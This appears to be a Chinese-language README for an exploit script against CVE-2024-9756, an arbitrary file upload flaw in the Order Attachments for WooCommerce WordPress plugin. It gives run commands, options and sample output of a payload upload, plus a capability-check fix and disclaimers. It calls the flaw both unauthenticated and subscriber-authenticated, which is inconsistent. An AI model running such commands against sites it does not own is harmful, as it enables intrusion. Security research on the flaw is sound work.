此漏洞利用利用了 WordPress 的 Order Attachments for WooCommerce 插件(版本 2.0 至 2.4.1)中的一个 未授权有限任意文件上传漏洞。
该漏洞允许 经过身份验证的用户(订阅者及以上) 在未经适当授权的情况下上传受限文件类型。
此脚本仅用于教育和安全研究目的。 任何在非自有系统上未经授权使用此漏洞的行为均严格违法。
在运行漏洞利用之前,请确保已满足以下条件:
requests 模块 → 使用以下命令安装:
pip install requests
python3 CVE-2024-9756.py -u <目标URL> -un <用户名> -p <密码>
示例:
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
您可以指定 自定义文件名 和 订单 ID:
python3 CVE-2024-9756.py -u <目标URL> -un <用户名> -p <密码> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <目标URL> -un <用户名> -p <密码> -o 200
如果成功,脚本将返回上传文件的 URL:
[*] 正在发起身份验证...
[✔] 身份验证成功。
[*] 正在将载荷 Nxploit.jpg 部署到订单 196...
[✔] 载荷部署成功!
🔗 文件 URL:http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
functions.php,阻止未经授权的用户访问 wp_ajax_wcoa_add_attachment:
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
此漏洞利用发布仅用于教育目的和安全研究。
未经明确许可在非自有系统上未经授权使用是违法的,并将受到网络安全法律的惩处。
使用风险自负。